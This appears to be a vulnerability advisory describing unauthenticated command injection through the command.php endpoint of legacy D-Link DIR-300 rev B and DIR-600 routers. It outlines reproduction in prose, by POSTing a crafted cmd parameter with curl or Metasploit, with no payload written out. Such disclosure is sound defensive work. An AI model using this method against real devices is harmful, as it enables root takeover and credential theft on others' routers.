D-Link Legacy Routers OS Command Injection Vulnerability Allowing Unauthenticated Remote Code Execution

A command injection vulnerability has been identified in various legacy D-Link routers, specifically the DIR-300 rev B and DIR-600 models, running firmware versions through 2.13 and 2.14b01, respectively. The vulnerability arises from improper input validation in the command.php endpoint, which is accessible without authentication. This flaw allows remote attackers to execute arbitrary shell commands with root privileges, potentially leading to a complete takeover of the device. Exploitation could involve starting a Telnet service, extracting credentials, altering system configurations, or causing a denial-of-service by crashing the device's web server.

Impact

Successful exploitation of this vulnerability allows for unauthenticated remote code execution with root privileges on the affected router.

Reproduction

The vulnerability can be reproduced by sending a POST request to the command.php endpoint with a crafted command in the cmd parameter. This can be done using tools like curl or through a Metasploit module designed for this exploit. Once the command is executed, the response can be checked to confirm the successful execution of the injected command.